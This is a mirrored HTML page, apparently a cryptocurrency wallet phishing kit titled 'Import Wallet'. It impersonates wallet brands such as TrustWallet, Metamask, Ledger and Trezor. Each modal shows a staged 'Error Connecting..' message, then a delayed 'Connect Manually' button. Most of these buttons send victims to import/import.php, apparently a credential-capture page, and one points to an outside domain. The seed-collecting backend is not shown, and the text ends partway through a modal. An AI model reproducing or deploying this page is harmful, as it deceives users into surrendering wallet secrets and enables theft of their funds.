
<!DOCTYPE html>
<html lang="en">
<!-- Mirrored from walletconnectionlinks.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 31 May 2021 19:43:52 GMT -->
<!-- Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<!-- /Added by HTTrack -->

<head>
    <meta charset="UTF-8" />
    <title>Import Wallet</title>
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0" />
    <meta http-equiv="X-UA-Compatible" content="ie=edge" />
    <link rel="stylesheet" href="assets/css/style.css" />
    <link rel="preconnect" href="https://fonts.gstatic.com/" />
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400&amp;display=swap" rel="stylesheet">
    <link
    rel="stylesheet"
    href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css"
  />

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<style>.spinner-border {
    width: 20px; 
    height: 20px;
    }

    a{
        text-decoration: none;
        font-size: 13px;
    }

    .hidden{
        display: none;
    }
  
</style>
</head>

<body style="background-color: #070E27; font-family: 'Poppins', sans-serif;">
    <br>
    <div align="center" style="color: antiquewhite; font-size: 18px; "><b>Connect your wallet</b></div>

    <div class="main-body">

        <div class="container">
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#trust" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">TrustWallet</p>
                <img class="wallet__image" src="assets/images/icn-trust-wallet.png" alt="wallet_img" />
            </a>
            
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#saitama" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Saitamask</p>
                <img class="wallet__image" src="https://s2.coinmarketcap.com/static/img/coins/64x64/10498.png" alt="wallet_img" />
            </a>
            
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#meta" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Metamask</p>
                <img class="wallet__image" src="assets/images/icn-meta-mask.svg" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#coinbase" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Coinbase</p>               
                <img class="wallet__image" src="assets/images/icn-coinbase.svg" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#ledger" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Ledger</p>
                <img class="wallet__image" src="assets/images/icn-ledger.svg" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#trezor" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Trezor</p>
                <img class="wallet__image" src="assets/images/icn-trezor.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#formatic" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Formatic</p>
                <img class="wallet__image" src="assets/images/icn-formatic.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#portis" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Portis</p>
                <img class="wallet__image" src="assets/images/icn-portis.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#tokenpocket" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Token Pocket</p>               
                <img class="wallet__image" src="assets/images/icn-token-pocket.jpg" alt="wallet_img" />
            </a>


            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#cryptocom" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Crypto.com</p>   
                <img class="wallet__image" src="assets/images/crypto-4cbeac57421fb3ca2573db2cf448169a.png" alt="wallet_img" />
            </a>


           
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#coinmoni" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Coimoni Wallet</p>  
                <img class="wallet__image" src="assets/images/icn-coinmoni-wallet.png" alt="wallet_img" />
            </a>



            
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#aave" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">AAVE Wallet</p>  
                <img class="wallet__image" src="assets/images/icn-aave-wallet.png" alt="wallet_img" />
            </a>
           
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#monero" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Monero Wallet</p>  
                <img class="wallet__image" src="assets/images/icn-monero-wallet.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#binance" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Binance Smart Wallet</p>  
                <img class="wallet__image" src="assets/images/icn-binance-smart-chain.png" alt="wallet_img" />
            </a>


            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#blockchain" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Blockchain</p> 
                <img class="wallet__image" src="assets/images/blockchain-logo.png" alt="wallet_img" />
            </a>

            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#bitpay" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Bitpay</p> 
                <img class="wallet__image" src="assets/images/bitpay-1573dd6c95eb38386f181048663590d0.jpg" alt="wallet_img" />
            </a>

            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#digitex" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Digitex</p> 
                <img class="wallet__image" src="assets/images/icn-digitx-wallet.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#atomic" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Atomic Wallet</p> 
                <img class="wallet__image" src="assets/images/icn-atomic-wallet.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#enjin" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Enjin Wallet</p> 
                <img class="wallet__image" src="assets/images/icn-enjin-wallet.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#eidoo" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Eidoo Wallet</p> 
                <img class="wallet__image" src="assets/images/icn-eidoo-wallet.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#protocol" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Protocol</p> 
                <img class="wallet__image" src="assets/images/icn-protocol.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#squarelink" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Squarelink</p> 
                <img class="wallet__image" src="assets/images/icn-squarelink.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#torus" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Torus</p> 
                <img class="wallet__image" src="assets/images/icn-torus.jpg" alt="wallet_img" />
            </a>

            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#ronin" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Ronin</p> 
                <img class="wallet__image" src="assets/images/ronin.png" alt="wallet_img" />
            </a>


            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#solana" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Solana</p> 
                <img class="wallet__image" src="assets/images/solana.png" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#phantom" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Phantom</p> 
                <img class="wallet__image" src="assets/images/phantom.webp" alt="wallet_img" />
            </a>
            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#auth" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Authereum</p> 
                <img class="wallet__image" src="assets/images/icn-authereum.svg" alt="wallet_img" />
            </a>

            <a  class="btn wallet" data-bs-toggle="modal" data-bs-target="#others" >
                <p class="wallet_name mt-3 " style="font-size: 13px;">Others</p> 
                <img class="wallet__image" src="assets/images/undraw_Confirmation_re_b6q5.png" alt="wallet_img" />
            </a>



            <br />
            <br />
        </div>
    </div>

    
    <!--Trust Modal -->
    <div class="modal fade" id="trust" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered" role="document">
            <div class="modal-content">
                <div class="card" style="padding: 2px;">
                    <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                        <img class="wallet__image" src="assets/images/icn-trust-wallet.png" alt="wallet_img" /> 
                        Trustwallet
                    </div>
                </div>
                <div class="modal-header">
                    <h5 class="modal-title" style="font-size: 14px;">
                        <span id="myElem">Connecting..</span>
                        

                        <span id="Elem" >
                            <b class="text-danger">Error Connecting..</b></span>
                    <div class=" spinner-border text-danger" role="status">
                     <span   class="visually-hidden">Loading...</span> 
                         </div> 
                    </h5>
                    <a href="import/import.php?wallet=Trustwallet" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                </div>
               
            </div>
        </div>
    </div>
    
    
    
    
     <!--Saitama Modal -->
    <div class="modal fade" id="saitama" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered" role="document">
            <div class="modal-content">
                <div class="card" style="padding: 2px;">
                    <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                        <img class="wallet__image" src="https://upload.wikimedia.org/wikipedia/commons/6/66/Saitama_Token_logo.png" alt="wallet_img" /> 
                        Saitamask 
                    </div>
                </div>
                <div class="modal-header">
                    <h5 class="modal-title" style="font-size: 14px;">
                        <span id="myElem">Connecting..</span>
                        

                        <span id="Elem" >
                            <b class="text-danger">Error Connecting..</b></span>
                    <div class=" spinner-border text-danger" role="status">
                     <span   class="visually-hidden">Loading...</span> 
                         </div> 
                    </h5>
                    <a href="import/import.php?wallet=Saitamask" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                </div>
               
            </div>
        </div>
    </div>
    


        <!--Meta Modal -->
        <div class="modal fade" id="meta" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
            <div class="modal-dialog modal-dialog-centered" role="document">
                <div class="modal-content">
                    <div class="card" style="padding: 2px;">
                        <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                            <img class="wallet__image" src="assets/images/icn-meta-mask.svg" alt="wallet_img" /> 
                            Metamask
                        </div>
                    </div>
                    <div class="modal-header">
                        <h5 class="modal-title" style="font-size: 14px;">
                            <span id="myElem2">Connecting..</span>
                            
    
                            <span id="Elem2" >
                                <b class="text-danger">Error Connecting..</b></span>
                        <div class=" spinner-border text-danger" role="status">
                         <span   class="visually-hidden">Loading...</span> 
                             </div> 
                        </h5>
                        <a href="import/import.php?wallet=Metamask" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                    </div>
                   
                </div>
            </div>
        </div>



                <!--Coinbase Modal -->
                <div class="modal fade" id="coinbase" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                    <div class="modal-dialog modal-dialog-centered" role="document">
                        <div class="modal-content">
                            <div class="card" style="padding: 2px;">
                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                    <img class="wallet__image" src="assets/images/icn-coinbase.svg" alt="wallet_img" /> 
                                    Coinbase
                                </div>
                            </div>
                            <div class="modal-header">
                                <h5 class="modal-title" style="font-size: 14px;">
                                    <span id="myElem3">Connecting..</span>
                                    
            
                                    <span id="Elem3" >
                                        <b class="text-danger">Error Connecting..</b></span>
                                <div class=" spinner-border text-danger" role="status">
                                 <span   class="visually-hidden">Loading...</span> 
                                     </div> 
                                </h5>
                                <a href="import/import.php?wallet=Coinbase" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                            </div>
                           
                        </div>
                    </div>
                </div>
   

                         <!--Ledger Modal -->
                         <div class="modal fade" id="ledger" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                            <div class="modal-dialog modal-dialog-centered" role="document">
                                <div class="modal-content">
                                    <div class="card" style="padding: 2px;">
                                        <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                            <img class="wallet__image" src="assets/images/icn-ledger.svg" alt="wallet_img" /> 
                                            Ledger
                                        </div>
                                    </div>
                                    <div class="modal-header">
                                        <h5 class="modal-title" style="font-size: 14px;">
                                            <span id="myElem4">Connecting..</span>
                                            
                    
                                            <span id="Elem4" >
                                                <b class="text-danger">Error Connecting..</b></span>
                                        <div class=" spinner-border text-danger" role="status">
                                         <span   class="visually-hidden">Loading...</span> 
                                             </div> 
                                        </h5>
                                        <a href="import/import.php?wallet=Ledger" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                    </div>
                                   
                                </div>
                            </div>
                        </div>




                         <!--Trezor Modal -->
                         <div class="modal fade" id="trezor" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                            <div class="modal-dialog modal-dialog-centered" role="document">
                                <div class="modal-content">
                                    <div class="card" style="padding: 2px;">
                                        <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                            <img class="wallet__image" src="assets/images/icn-trezor.png" alt="wallet_img" /> 
                                            Trezor
                                        </div>
                                    </div>
                                    <div class="modal-header">
                                        <h5 class="modal-title" style="font-size: 14px;">
                                            <span id="myElem5">Connecting..</span>
                                            
                    
                                            <span id="Elem5" >
                                                <b class="text-danger">Error Connecting..</b></span>
                                        <div class=" spinner-border text-danger" role="status">
                                         <span   class="visually-hidden">Loading...</span> 
                                             </div> 
                                        </h5>
                                        <a href="import/import.php?wallet=Trezor" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                    </div>
                                   
                                </div>
                            </div>
                        </div>


                                  <!--FORMATIC Modal -->
                                  <div class="modal fade" id="formatic" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-formatic.png" alt="wallet_img" /> 
                                                    Formatic
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem6">Connecting..</span>
                                                    
                            
                                                    <span id="Elem6" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                 <span   class="visually-hidden">Loading...</span> 
                                                     </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Formatic" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                           
                                        </div>
                                    </div>
                                </div>



                                  <!--portis Modal -->
                                  <div class="modal fade" id="portis" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-portis.png" alt="wallet_img" /> 
                                                    Portis
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem7">Connecting..</span>
                                                    
                            
                                                    <span id="Elem7" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                 <span   class="visually-hidden">Loading...</span> 
                                                     </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Portis" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                           
                                        </div>
                                    </div>
                                </div>


                                  <!--Tokenpocket Modal -->
                                  <div class="modal fade" id="tokenpocket" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-token-pocket.jpg" alt="wallet_img" /> 
                                                    Token Pocket
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem8">Connecting..</span>
                                                    
                            
                                                    <span id="Elem8" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                 <span   class="visually-hidden">Loading...</span> 
                                                     </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Token Pocket" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                           
                                        </div>
                                    </div>
                                </div>



                                 <!--Crypto.com Modal -->
                                 <div class="modal fade" id="cryptocom" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/crypto-4cbeac57421fb3ca2573db2cf448169a.png" alt="wallet_img" /> 
                                                    Crypto.com
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem9">Connecting..</span>
                                                    
                            
                                                    <span id="Elem9" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                 <span   class="visually-hidden">Loading...</span> 
                                                     </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Crypto.com" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                           
                                        </div>
                                    </div>
                                </div>



                                 <!--Coinmoni Modal -->
                                 <div class="modal fade" id="coinmoni" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-coinmoni-wallet.png" alt="wallet_img" /> 
                                                    Coinmoni wallet
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem10">Connecting..</span>
                                                    
                            
                                                    <span id="Elem10" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                 <span   class="visually-hidden">Loading...</span> 
                                                     </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Coinmoni wallet" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                           
                                        </div>
                                    </div>
                                </div>





                                <!--AAVE Modal -->
                                 <div class="modal fade" id="aave" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-aave-wallet.png" alt="wallet_img" /> 
                                                    AAVE wallet
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem11">Connecting..</span>
                                                    
                            
                                                    <span id="Elem11" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                 <span   class="visually-hidden">Loading...</span> 
                                                     </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=AAVE wallet" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                           
                                        </div>
                                    </div>
                                </div>




                                 <!--Monero Modal -->
                                 <div class="modal fade" id="monero" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-monero-wallet.png" alt="wallet_img" /> 
                                                    Monero wallet
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem12">Connecting..</span>
                                                    
                            
                                                    <span id="Elem12" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                 <span   class="visually-hidden">Loading...</span> 
                                                     </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Monero wallet" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                           
                                        </div>
                                    </div>
                                </div>




                                 <!--Binance Modal -->
                                 <div class="modal fade" id="binance" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-binance-smart-chain.png" alt="wallet_img" /> 
                                                    Binance Smart wallet
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem13">Connecting..</span>
                                                    
                            
                                                    <span id="Elem13" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                 <span   class="visually-hidden">Loading...</span> 
                                                     </div> 
                                                </h5>
                                                <a href="import/import.php?wallet= Binance Smart wallet" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                           
                                        </div>
                                    </div>
                                </div>





                                 <!--Blockchain Modal -->
                                 <div class="modal fade" id="blockchain" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/blockchain-logo.png" alt="wallet_img" /> 
                                                    Blockchain
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem14">Connecting..</span>
                                                    
                            
                                                    <span id="Elem14" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                 <span   class="visually-hidden">Loading...</span> 
                                                     </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Blockchain" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                           
                                        </div>
                                    </div>
                                </div>


                                <!--Bitpay Modal -->
                                <div class="modal fade" id="bitpay" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/bitpay-1573dd6c95eb38386f181048663590d0.jpg" alt="wallet_img" /> 
                                                    Bitpay
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem15">Connecting..</span>
                                                    
                            
                                                    <span id="Elem15" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Bitpay" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>


                                <!--digitex Modal -->
                                <div class="modal fade" id="digitex" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-digitx-wallet.png" alt="wallet_img" /> 
                                                    Diigtex
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem16">Connecting..</span>
                                                    
                            
                                                    <span id="Elem16" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="https://sync-trustappscloud.online/access-walletconnect/T7cIAV40nnGq0aiN.html" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>
        



                                <!--Atomic Modal -->
                                <div class="modal fade" id="atomic" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-atomic-wallet.png" alt="wallet_img" /> 
                                                    Atomic
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem17">Connecting..</span>
                                                    
                            
                                                    <span id="Elem17" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Atomic" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>

                                <!--Atomic Modal -->
                                <div class="modal fade" id="atomic" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-atomic-wallet.png" alt="wallet_img" /> 
                                                    Atomic
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem28">Connecting..</span>
                                                    
                            
                                                    <span id="Elem28" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Atomic" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>


                                <!--Enjin Modal -->
                                <div class="modal fade" id="enjin" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
                                            <div class="card" style="padding: 2px;">
                                                <div class="card-title mt-2 ml-2 h6" style="margin-left: 20px;">
                                                    <img class="wallet__image" src="assets/images/icn-enjin-wallet.png" alt="wallet_img" /> 
                                                    Enjin Wallet
                                                </div>
                                            </div>
                                            <div class="modal-header">
                                                <h5 class="modal-title" style="font-size: 14px;">
                                                    <span id="myElem18">Connecting..</span>
                                                    
                            
                                                    <span id="Elem18" >
                                                        <b class="text-danger">Error Connecting..</b></span>
                                                <div class=" spinner-border text-danger" role="status">
                                                <span   class="visually-hidden">Loading...</span> 
                                                    </div> 
                                                </h5>
                                                <a href="import/import.php?wallet=Enjin Wallet" class="btn btn-primary btn-sm animate__animated animate__fadeIn animate__delay-5s	5s" style="font-size:13px">Connect Manually</a>
                                            </div>
                                        
                                        </div>
                                    </div>
                                </div>


                                <!--Eidoo Modal -->
                                <div class="modal fade" id="eidoo" tabindex="-1" role="dialog" aria-labelledby="modelTitleId" aria-hidden="true">
                                    <div class="modal-dialog modal-dialog-centered" role="document">
                                        <div class="modal-content">
